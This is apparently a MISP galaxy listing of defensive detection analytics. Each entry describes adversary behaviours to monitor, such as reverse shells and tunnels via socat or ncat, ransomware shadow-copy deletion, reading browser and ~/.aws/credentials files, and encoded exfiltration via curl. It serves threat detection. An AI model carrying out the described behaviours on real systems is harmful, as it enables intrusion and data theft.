Behavioral chain involving suspicious use of GetProcAddress and LoadLibrary following memory allocation and manual mapping, often paired with low entropy strings, abnormal API use without static import tables, or delayed module load behaviors.

Internal MISP references

UUID 48a818ac-077b-46ff-b615-bb2958536aef which can be used as unique global reference for Analytic 0250 - AN0250 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0250
mitre_platforms ['Windows']

Analytic 0502 - AN0502

Adversary uses a tool like Ruler to configure a malicious Outlook folder Home Page that loads a remote or embedded HTML payload upon folder interaction. Execution chain begins with Outlook launching, a specific folder being accessed, and a suspicious child process being spawned or COM-based execution invoked.

Internal MISP references

UUID 5ce49e4b-a67f-46ea-b48d-f08f7b942fb4 which can be used as unique global reference for Analytic 0502 - AN0502 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0502
mitre_platforms ['Windows']

Analytic 0205 - AN0205

socat, ssh, iptables, or ncat invoked from user space or cron jobs to create port forwarding, reverse shells, or inter-host tunnels between compromised Linux systems. Behavior is typically paired with socket activity and high entropy traffic.

Internal MISP references

UUID 7f269271-6800-4d20-b9f7-6c38cecac6f0 which can be used as unique global reference for Analytic 0205 - AN0205 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0205
mitre_platforms ['Linux']

Analytic 0025 - AN0025

Detects inotify or auditd configuration changes that monitor system files coupled with execution of script interpreters or binaries by cron or systemd timers.

Internal MISP references

UUID 92d182e9-6723-43e4-9eab-f00aa6d53153 which can be used as unique global reference for Analytic 0025 - AN0025 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0025
mitre_platforms ['Linux']

Analytic 0052 - AN0052

A process (often LOLBin or user-launched program) loads a DLL from a user-writable/UNC/Temp path or unsigned/invalid signer. Within a short window the DLL is (a) newly written to disk, (b) spawned as follow-on execution (rundll32/regsvr32), or (c) establishes outbound C2.

Internal MISP references

UUID cc5f309c-6eb0-4f96-ba1a-0f4fd3bc1b79 which can be used as unique global reference for Analytic 0052 - AN0052 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0052
mitre_platforms ['Windows']

Analytic 2006 - AN2006

Once adversaries have provisioned software on a compromised server (ex: for use as a command and control server), internet scans may reveal servers that adversaries have compromised. Consider looking for identifiable patterns such as services listening, certificates in use, SSL/TLS negotiation features, or other response artifacts associated with adversary C2 software.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: Mandiant SCANdalous Jul 2020)(Citation: Koczwara Beacon Hunting Sep 2021) Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.

Internal MISP references

UUID 0fc0c7ce-e56d-4f3f-ab91-903861124816 which can be used as unique global reference for Analytic 2006 - AN2006 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN2006
mitre_platforms ['PRE']

Analytic 0602 - AN0602

High-frequency file write operations using uncommon extensions, followed by ransom note creation, registry tampering, or shadow copy deletion. Often uses CLI tools like vssadmin, wbadmin, cipher, or PowerShell.

Internal MISP references

UUID 1155df11-eee4-4fdf-a354-15eda0e90d4c which can be used as unique global reference for Analytic 0602 - AN0602 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0602
mitre_platforms ['Windows']

Analytic 0620 - AN0620

Processes accessing ALSA/PulseAudio devices or executing audio capture binaries like 'arecord', followed by file creation or suspicious child process spawning.

Internal MISP references

UUID 3ac9b4c2-9137-4d20-9619-01029d656874 which can be used as unique global reference for Analytic 0620 - AN0620 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0620
mitre_platforms ['Linux']

Analytic 0026 - AN0026

Correlates launchd plist modifications with subsequent unauthorized script execution or anomalous parent-child process trees involving user agents.

Internal MISP references

UUID 636b1cca-1fc4-4909-ac33-c2b2a7d69e02 which can be used as unique global reference for Analytic 0026 - AN0026 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0026
mitre_platforms ['macOS']

Analytic 0260 - AN0260

Detects creation or alteration of LaunchAgents or LaunchDaemons with corresponding plist modification followed by execution of associated binaries.

Internal MISP references

UUID 8cbda989-39e6-4f9e-8e23-213f92b3479d which can be used as unique global reference for Analytic 0260 - AN0260 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0260
mitre_platforms ['macOS']

Analytic 0206 - AN0206

Execution of AppleScript or Automator services launching ssh -L, socat, or launchctl items that dynamically reroute traffic from one Mac endpoint to another. LaunchAgents used to establish permanent internal tunnels.

Internal MISP references

UUID c62026a7-3332-489f-bb86-30626c1b3cc8 which can be used as unique global reference for Analytic 0206 - AN0206 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0206
mitre_platforms ['macOS']

Analytic 0062 - AN0062

Adversary executes systemctl or service stop targeting high-value services (e.g., mysql, sshd), possibly followed by rm or shred against data stores. Behavioral chain: sudo/su usage + stop command + /var/log/messages or syslog entries + file access/delete.

Internal MISP references

UUID ea793457-89e6-47d2-8ae1-7fd2bd814f82 which can be used as unique global reference for Analytic 0062 - AN0062 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0062
mitre_platforms ['Linux']

Analytic 0027 - AN0027

Monitors cloud function creation triggered by specific audit log events (e.g., IAM changes, object creation), followed by anomalous behavior from new service accounts.

Internal MISP references

UUID 0fb1d87b-e993-447e-8a2f-e9d42f6859c0 which can be used as unique global reference for Analytic 0027 - AN0027 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0027
mitre_platforms ['IaaS']

Analytic 2007 - AN2007

Consider analyzing code signing certificates for features that may be associated with the adversary and/or their developers, such as the thumbprint, algorithm used, validity period, common name, and certificate authority. Malware repositories can also be used to identify additional samples associated with the adversary and identify patterns an adversary has used in procuring code signing certificates. Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related follow-on behavior, such as Code Signing or Install Root Certificate.

Internal MISP references

UUID 23b9c988-be01-4092-b9c4-0ddec8d58891 which can be used as unique global reference for Analytic 2007 - AN2007 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN2007
mitre_platforms ['PRE']

Analytic 0702 - AN0702

Monitor for anomalies in transmitted data streams, including mismatched file integrity checks, API interception, or man-in-the-middle modifications. Detect unexpected use of APIs that handle network I/O where transmitted data integrity could be manipulated.

Internal MISP references

UUID 4cf44d48-1a0f-45a4-9a25-8bee9677ab52 which can be used as unique global reference for Analytic 0702 - AN0702 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0702
mitre_platforms ['Windows']

Analytic 0720 - AN0720

On Linux systems, forged credentials may be injected into browser session files, curl/wget headers, or token caches in memory. Detection can leverage auditd to track processes accessing sensitive files (~/.mozilla, ~/.config/chromium, ~/.aws/credentials) and correlate with suspicious outbound connections.

Internal MISP references

UUID 789849fe-7e94-4fd0-904b-02f8c9c0a696 which can be used as unique global reference for Analytic 0720 - AN0720 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0720
mitre_platforms ['Linux']

Analytic 0072 - AN0072

Abuse of Linux Electron binaries by modifying app.asar or config JS files and spawning unexpected child processes (bash, curl, python).

Internal MISP references

UUID 8129e7b8-eaa1-4459-ba70-ebf6d68ca16c which can be used as unique global reference for Analytic 0072 - AN0072 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0072
mitre_platforms ['Linux']

Analytic 0207 - AN0207

ESXi shell execution of tools/scripts (nc, socat, perl) relaying network traffic to other internal hosts, especially when initiated by unauthorized users or VMs.

Internal MISP references

UUID c1fd84b0-953d-463b-a293-3d6aa81e4589 which can be used as unique global reference for Analytic 0207 - AN0207 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0207
mitre_platforms ['ESXi']

Analytic 0270 - AN0270

Role escalation (e.g., Editor → Owner) in cloud collaboration tools (Google Workspace, O365) or file sharing apps to maintain elevated access.

Internal MISP references

UUID eb4a55f0-eff2-40f8-912e-43ba7e34603c which can be used as unique global reference for Analytic 0270 - AN0270 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0270
mitre_platforms ['SaaS']

Analytic 0082 - AN0082

Suspicious long-lived or high-throughput connections by non-Apple signed apps or processes not commonly associated with network uploads. Detect background processes using open sockets for data egress.

Internal MISP references

UUID 35a5d72b-6c69-498a-9118-14cd6c85a57a which can be used as unique global reference for Analytic 0082 - AN0082 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0082
mitre_platforms ['macOS']

Analytic 0208 - AN0208

Configuration of internal NAT or proxy rules that redirect traffic between client segments internally (e.g., site-to-site port forwarding). Often used to relay internal beaconing or move traffic laterally through trust zones.

Internal MISP references

UUID 42ba4dcf-0354-4d70-8c29-d0c3a8c90c23 which can be used as unique global reference for Analytic 0208 - AN0208 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0208
mitre_platforms ['Network Devices']

Analytic 2008 - AN2008

Consider monitoring social media activity related to your organization. Suspicious activity may include personas claiming to work for your organization or recently modified accounts making numerous connection requests to accounts affiliated with your organization. Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access (ex: Phishing). Monitor and analyze traffic patterns and packet inspection associated to protocol(s) that do not follow the expected protocol standards and traffic flows (e.g extraneous packets that do not belong to established flows, gratuitous or anomalous traffic patterns, anomalous syntax, or structure). Consider correlation with process monitoring and command line to detect anomalous processes execution and command line arguments associated to traffic patterns (e.g. monitor anomalies in use of files that do not normally initiate connections for respective protocol(s)).

Internal MISP references

UUID 44001c2d-9832-4b2d-b3ac-a25cea93e03f which can be used as unique global reference for Analytic 2008 - AN2008 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN2008
mitre_platforms ['PRE']

Analytic 0280 - AN0280

Detects Lua script execution via native or 3rd party interpreters, chained with unsigned binaries or unexpected parent lineage.

Internal MISP references

UUID 4b53b71f-16b4-483b-b64a-eacf6c9db077 which can be used as unique global reference for Analytic 0280 - AN0280 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0280
mitre_platforms ['macOS']

Analytic 0820 - AN0820

User opens a downloaded document/installer leading to EndpointSecurity file create in ~/Downloads or ~/Library paths then an exec of a suspicious utility (osascript, bash/zsh, curl, chmod, open with -a Terminal). Correlates File Creation with subsequent process exec and, optionally, quarantine/LSQuarantine events.

Internal MISP references

UUID 5becf65d-da9f-46e1-8edc-eea05c9dc6cb which can be used as unique global reference for Analytic 0820 - AN0820 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0820
mitre_platforms ['macOS']

Analytic 0802 - AN0802

Disabling or modifying sign-in or audit log collection for user activities. Defender view: policy or configuration updates removing logging coverage for critical accounts.

Internal MISP references

UUID 8e0f5333-9fc0-4f03-ae12-cf98903e08ea which can be used as unique global reference for Analytic 0802 - AN0802 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0802
mitre_platforms ['Identity Provider']

Analytic 0028 - AN0028

Correlates Power Automate or similar logic app workflows triggered by SaaS file uploads or email rules with data forwarding or anomalous access patterns.

Internal MISP references

UUID 982100e1-6d38-4d0e-b36d-7e2d2cf5a424 which can be used as unique global reference for Analytic 0028 - AN0028 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0028
mitre_platforms ['SaaS']

Analytic 0209 - AN0209

Detects execution of VB-based scripts or macros (VBS/VBA/VBScript) through cscript.exe/wscript.exe, Office-based process chains, or HTA usage. Focuses on chained behavior: Office or HTML container spawns script host > script host spawns PowerShell, network connections, or process injection.

Internal MISP references

UUID 0fe7a1db-759d-4d27-8ef1-a71509643594 which can be used as unique global reference for Analytic 0209 - AN0209 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0209
mitre_platforms ['Windows']

Analytic 0902 - AN0902

Adversaries leverage M365 or Google Workspace APIs to create users, service accounts, or guest accounts. Follow-on behaviors include login activity, role escalation, or service principal token generation.

Internal MISP references

UUID 53872bd3-7e5e-4573-ae07-6304bf7e49af which can be used as unique global reference for Analytic 0902 - AN0902 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0902
mitre_platforms ['Office Suite']

Analytic 0920 - AN0920

Detects files or processes where execution results in frequent re-creation or modification of ELF binaries or interpreter scripts, often using chmod + execve with abnormal entropy.

Internal MISP references

UUID 6ed3efbf-c060-4c7f-8d8b-0e93f65a0790 which can be used as unique global reference for Analytic 0920 - AN0920 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0920
mitre_platforms ['Linux']

Analytic 0290 - AN0290

Detects suspicious configuration changes in IdP authentication flows such as enabling reversible password encryption, MFA bypass, or policy weakening. Correlates policy modification events with unusual administrative activity.

Internal MISP references

UUID bbaa7fb3-974c-41ef-9cec-a0789a66445c which can be used as unique global reference for Analytic 0290 - AN0290 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0290
mitre_platforms ['Identity Provider']

Analytic 0092 - AN0092

Creation of files or directories with a leading '.' in privileged directories (/etc, /var, /usr/bin). Defender view: monitoring auditd logs for file creations where name begins with '.' and correlated with unusual user/process context.

Internal MISP references

UUID c4108797-7eb4-4ef8-8dee-c2db00695ab4 which can be used as unique global reference for Analytic 0092 - AN0092 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0092
mitre_platforms ['Linux']

Analytic 2009 - AN2009

Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.

Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.

Internal MISP references

UUID cf66582f-6fa3-4d3b-a322-95c2af08b49b which can be used as unique global reference for Analytic 2009 - AN2009 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN2009
mitre_platforms ['PRE']

Analytic 0029 - AN0029

Detects macros or VBA triggers set to execute on document open or close events, often correlating with embedded payloads or C2 traffic shortly after execution.

Internal MISP references

UUID d8e18081-2670-4a88-9246-59a1dc52c51c which can be used as unique global reference for Analytic 0029 - AN0029 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0029
mitre_platforms ['Office Suite']

Analytic 0330 - AN0330

Ties inbound access to exposed services (ARD/VNC 5900, SSH 22, ScreenSharing, web services) with process crashes in unified logs and abnormal child processes spawned under those services (e.g., bash, curl) to indicate exploitation.

Internal MISP references

UUID 32ef36a3-3112-40a1-84d0-323b7b86cb5b which can be used as unique global reference for Analytic 0330 - AN0330 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0330
mitre_platforms ['macOS']

Analytic 0303 - AN0303

Custom scripts or processes encode outbound traffic using gzip, Base64, or hex prior to exfiltration via curl, wget, or custom sockets. Encoding typically occurs before or during outbound connections from non-network daemons.

Internal MISP references

UUID d32cc2a4-60ed-4761-809e-a59cde2a1881 which can be used as unique global reference for Analytic 0303 - AN0303 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0303
mitre_platforms ['Linux']

Analytic 0033 - AN0033

Anomalous traffic from ESXi host management daemons (like hostd or vpxa) embedding non-standard payloads in management protocols (e.g., HTTPS) or beaconing behavior.

Internal MISP references

UUID d3bad85b-9e86-4de8-9e4a-1666133af782 which can be used as unique global reference for Analytic 0033 - AN0033 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0033
mitre_platforms ['ESXi']

Analytic 0034 - AN0034

Discrepancies between VBA source code and p-code inside Office documents. Defender perspective: anomalies in file metadata streams, execution of Office processes loading macros without source code consistency, and script execution with no corresponding source metadata.

Internal MISP references

UUID 0ea214f3-5d66-4170-b33d-58a6577bb074 which can be used as unique global reference for Analytic 0034 - AN0034 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0034
mitre_platforms ['Windows']

Analytic 0304 - AN0304

Processes use built-in encoding utilities (e.g., base64, xxd, or plutil) to encode file contents followed by HTTP/HTTPS transfer via curl or custom applications.

Internal MISP references

UUID 2bf1ce64-970b-4d0d-bf5f-a854fc6d7235 which can be used as unique global reference for Analytic 0304 - AN0304 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0304
mitre_platforms ['macOS']

Analytic 0403 - AN0403

ESXi daemons (hostd, vpxa) unexpectedly using symmetric encryption routines for external connections. Defender identifies logs of service traffic with encrypted payloads inconsistent with VMware management baselines.

Internal MISP references

UUID 50102ced-9c8f-47e6-b438-63b2a7fe983d which can be used as unique global reference for Analytic 0403 - AN0403 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0403
mitre_platforms ['ESXi']

Analytic 0340 - AN0340

Creation or modification of Login Items using AppleScript or Service Management Framework. Detection focuses on file creation/modification of backgrounditems.btm, new executables in Contents/Library/LoginItems/, use of SMLoginItemSetEnabled API, or suspicious processes triggered post-login without user interaction. Behavioral pivot includes anomalous AppleEvents, suspicious parent-child process pairs, and login-triggered execution chains.

Internal MISP references

UUID 89e3509c-d732-4826-ac78-baea8fbf0834 which can be used as unique global reference for Analytic 0340 - AN0340 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0340
mitre_platforms ['macOS']

Analytic 0430 - AN0430

Untrusted or unusual process/script (cmd.exe, powershell.exe, w32tm.exe, net.exe, custom binaries) queries system time/timezone (e.g., w32tm /tz, net time \host, Get-TimeZone, GetTickCount API) and (optionally) is followed within a short window by time-based scheduling or conditional execution (e.g., schtasks /create, at.exe, PowerShell Start-Sleep with large values).

Internal MISP references

UUID bd34c127-9956-4616-999d-229f30512f74 which can be used as unique global reference for Analytic 0430 - AN0430 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0430
mitre_platforms ['Windows']

Analytic 0043 - AN0043

Detects virtual disk expansion or file copy operations to cloud buckets or mounted volumes from isolated instances.

Internal MISP references

UUID e622500c-4217-466c-955c-82ef3217653a which can be used as unique global reference for Analytic 0043 - AN0043 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0043
mitre_platforms ['IaaS']

Analytic 0053 - AN0053

A process loads a shared object (.so) via dlopen/LD_PRELOAD/open from non-standard or temporary locations (e.g., /tmp, /dev/shm), especially shortly after that .so is written or fetched, or linked via manipulated environment variables (LD_PRELOAD/LD_LIBRARY_PATH).

Internal MISP references

UUID 01c969ef-7057-44bd-bced-9b64a98234ec which can be used as unique global reference for Analytic 0053 - AN0053 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0053
mitre_platforms ['Linux']

Analytic 0530 - AN0530

Compromised service account tokens mounted inside containers and reused for external API calls or lateral movement across services.

Internal MISP references

UUID 03216652-ada9-4c1e-88c4-923c2cb60614 which can be used as unique global reference for Analytic 0530 - AN0530 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0530
mitre_platforms ['Containers']

Analytic 0503 - AN0503

Malicious HTML or script is rendered as a Home Page for a specific Outlook folder. Outlook accesses that folder, loads remote content, and executes embedded JavaScript or ActiveX/COM logic resulting in unauthorized actions or local execution.

Internal MISP references

UUID 616755c6-e83d-46ce-ad76-ac706074a575 which can be used as unique global reference for Analytic 0503 - AN0503 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0503
mitre_platforms ['Office Suite']

Analytic 0350 - AN0350

Adversary attempts to gain persistence by modifying ~/.ssh/authorized_keys via shell, text editor, echo or redirected output.

Internal MISP references

UUID 72dd4fd9-b6cb-4704-b845-0632fe224995 which can be used as unique global reference for Analytic 0350 - AN0350 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0350
mitre_platforms ['Linux']

Analytic 0305 - AN0305

ESXi daemons (e.g., hostd, vpxa) are wrapped or impersonated to send large outbound traffic using gzip/Base64 encoding over SSH or HTTP. These actions follow suspicious logins or shell access.

Internal MISP references

UUID cb428c22-0a5a-44c9-ae63-6b1bedb34fee which can be used as unique global reference for Analytic 0305 - AN0305 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0305
mitre_platforms ['ESXi']

Analytic 0035 - AN0035

Execution of Wine or LibreOffice macros with inconsistent VBA metadata. Defender perspective: file analysis showing p-code embedded without matching source streams.

Internal MISP references

UUID f9f7e5e7-edbf-442b-b4ea-d35455982ba8 which can be used as unique global reference for Analytic 0035 - AN0035 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0035
mitre_platforms ['Linux']

Analytic 0036 - AN0036

Opening of Office files where VBA source code appears benign or missing, but p-code remains active. Defender perspective: process execution of Office apps with macro execution lacking visible source components.

Internal MISP references

UUID 025e89c6-9383-48b5-b9f2-85ab31b6a7bb which can be used as unique global reference for Analytic 0036 - AN0036 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0036
mitre_platforms ['macOS']

Analytic 0306 - AN0306

Monitor for unexpected modifications of plist files in persistence or configuration directories (e.g., ~/Library/LaunchAgents, ~/Library/Preferences, /Library/LaunchDaemons). Detect when modifications are followed by execution of new or unexpected binaries. Track use of utilities such as defaults, plutil, or text editors making changes to Info.plist files. Correlate file modifications with subsequent process launches or service starts that reference the altered plist.

Internal MISP references

UUID 481966ed-de78-42e4-9c51-c69281a21650 which can be used as unique global reference for Analytic 0306 - AN0306 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0306
mitre_platforms ['macOS']

Analytic 0630 - AN0630

Detects behavior where files with non-executable or misleading extensions (e.g., .jpg, .txt) are created or modified but subsequently executed as binaries based on internal file headers or abnormal parent process lineage. This includes identifying polyglot files or malformed magic bytes indicative of masquerading attempts.

Internal MISP references

UUID 557e1f6e-5eeb-46ea-bcd2-5d858eea314c which can be used as unique global reference for Analytic 0630 - AN0630 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0630
mitre_platforms ['Windows']

Analytic 0063 - AN0063

Use of launchctl to stop services or kill critical background processes (e.g., securityd, com.apple.*), typically followed by command-line tools like rm or diskutil. Behavioral chain: Terminal or remote shell + launchctl bootout/disable + process termination + follow-on modification.

Internal MISP references

UUID 86ea7b9c-c017-463d-b5d5-377f6dbfae1e which can be used as unique global reference for Analytic 0063 - AN0063 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0063
mitre_platforms ['macOS']

Analytic 0603 - AN0603

Encryption via custom or open-source tools (e.g., openssl, gpg, aescrypt) recursively targeting user or system directories. Also includes overwrite of existing data and ransom note drops.

Internal MISP references

UUID b2f444b1-e434-40e1-9501-6b66a05a0201 which can be used as unique global reference for Analytic 0603 - AN0603 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0603
mitre_platforms ['Linux']

Analytic 0360 - AN0360

Suspicious use of scripting parameters or registry edits to hide process windows (e.g., powershell.exe -WindowStyle Hidden, or registry modifications pushing window positions off screen). Defender view: correlation of hidden execution with anomalous process lineage or hVNC-like CreateDesktop API calls.

Internal MISP references

UUID b3bad14e-39a8-4e90-b3e3-46974fd9c2bd which can be used as unique global reference for Analytic 0360 - AN0360 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0360
mitre_platforms ['Windows']

Analytic 0703 - AN0703

Detect alterations of transmitted data via monitoring syscalls (send, recv, write) or middleware interception. Identify mismatched file hashes when compared at origin vs. destination. Watch for anomalous activity from processes interacting with secure transmission services (e.g., OpenSSL, scp).

Internal MISP references

UUID 500ae9f9-c6c2-4160-ac03-072d963eba63 which can be used as unique global reference for Analytic 0703 - AN0703 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0703
mitre_platforms ['Linux']

Analytic 0370 - AN0370

Detects access to cloud APIs or CLI tools to move or sync files from sensitive buckets to external endpoints using protocols like HTTPS or S3 APIs.

Internal MISP references

UUID 8dbd751b-a2cf-418a-b409-daae78a250f8 which can be used as unique global reference for Analytic 0370 - AN0370 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0370
mitre_platforms ['IaaS']

Analytic 0037 - AN0037

Access to browser artifact locations (e.g., Chrome, Edge, Firefox) by processes like PowerShell, cmd.exe, or unknown tools, followed by file reads, decoding, or export operations indicating enumeration of bookmarks, autofill, or history databases.

Internal MISP references

UUID c233a50c-0fdb-412b-85f6-8ff71a3539b9 which can be used as unique global reference for Analytic 0037 - AN0037 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0037
mitre_platforms ['Windows']

Analytic 0307 - AN0307

Correlation of chmod operations setting setuid/setgid bits followed by privileged process execution (EUID != UID), especially from user-writable or abnormal paths.

Internal MISP references

UUID c7d513f4-5113-4031-8125-7f145128c2e1 which can be used as unique global reference for Analytic 0307 - AN0307 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0307
mitre_platforms ['Linux']

Analytic 0730 - AN0730

Use unified logs to detect unusual DNS responses correlated with subsequent connections to calculated or non-standard ports. Monitor non-browser apps making repeated outbound connections that deviate from expected patterns.

Internal MISP references

UUID e95ed4e2-d6bc-4a6f-acbc-bdbfcbaca158 which can be used as unique global reference for Analytic 0730 - AN0730 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0730
mitre_platforms ['macOS']

Analytic 0073 - AN0073

Abuse of macOS Electron apps by modifying app.asar bundles and spawning child processes (osascript, curl, sh) from Electron executables.

Internal MISP references

UUID f2c91a4c-1e79-4350-8a7e-94bc7b7b9a4c which can be used as unique global reference for Analytic 0073 - AN0073 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0073
mitre_platforms ['macOS']

Analytic 0308 - AN0308

Observation of chmod commands setting setuid/setgid bits, paired with launch of binaries under elevated execution context (e.g., root-owned binaries launched by unprivileged users).

Internal MISP references

UUID 08314a8b-becd-4853-8a6c-dd5a947b36c0 which can be used as unique global reference for Analytic 0308 - AN0308 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0308
mitre_platforms ['macOS']

Analytic 0083 - AN0083

Containerized apps or sidecar containers generating excessive outbound traffic or being leveraged for proxy networks. Includes sudden increases in network interface stats, especially in dormant or low-util apps.

Internal MISP references

UUID 2fe9bf69-b1a8-4c60-8b20-c11054d31158 which can be used as unique global reference for Analytic 0083 - AN0083 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0083
mitre_platforms ['Containers']

Analytic 0038 - AN0038

Unauthorized shell or script-based access to browser config or SQLite history files, typically in ~/.config/google-chrome/, ~/.mozilla/, or ~/.var/app folders, indicating enumeration of bookmarks or saved credentials.

Internal MISP references

UUID 4a5abd9c-b4f3-4c29-9406-82aa3401c049 which can be used as unique global reference for Analytic 0038 - AN0038 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0038
mitre_platforms ['Linux']

Analytic 0380 - AN0380

Detects non-interactive or script-driven email transmission using tools like sendmail, mailx, or custom SMTP scripts by background processes, especially when sending attachments or large payloads.

Internal MISP references

UUID a311af7c-2302-4113-8cc3-d5d599fa908a which can be used as unique global reference for Analytic 0380 - AN0380 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0380
mitre_platforms ['Linux']

Analytic 0830 - AN0830

Execution of destructive CLI commands such as format flash:, format disk, or equivalent vendor-specific commands that erase filesystem structures. Detection correlates AAA logs showing privileged access with immediate format/erase commands.

Internal MISP references

UUID d970c6c7-82d0-4977-9e2e-4b27af383ca5 which can be used as unique global reference for Analytic 0830 - AN0830 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0830
mitre_platforms ['Network Devices']

Analytic 0803 - AN0803

Disabling mailbox or tenant-level audit logging, often using Set-MailboxAuditBypassAssociation or downgrading license tiers. Defender view: sudden absence of mailbox activity logging for monitored users.

Internal MISP references

UUID e42656e7-6a0e-492e-82b6-90d0d5667993 which can be used as unique global reference for Analytic 0803 - AN0803 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0803
mitre_platforms ['Office Suite']

Analytic 0039 - AN0039

Scripting or CLI tool access to ~/Library/Application Support/Google/Chrome or ~/Library/Safari bookmarks, cookies, or history databases. Detection relies on unexpected processes accessing or reading from these locations.

Internal MISP references

UUID 353e902d-b33c-466b-9276-5f224a259934 which can be used as unique global reference for Analytic 0039 - AN0039 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0039
mitre_platforms ['macOS']

Analytic 0309 - AN0309

Detection correlates message events in email and collaboration tools (e.g., Outlook, Teams) that contain regex-like patterns resembling credentials, API keys, or tokens. Anomalous forwarding or bulk copy activity of chat/email content containing secrets is flagged. Suspicious behavior includes users pasting secrets into direct messages or attaching config files with passwords.

Internal MISP references

UUID 631da3e4-5ecd-4dc9-966a-1c2633f8f24c which can be used as unique global reference for Analytic 0309 - AN0309 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0309
mitre_platforms ['Office Suite']

Analytic 0093 - AN0093

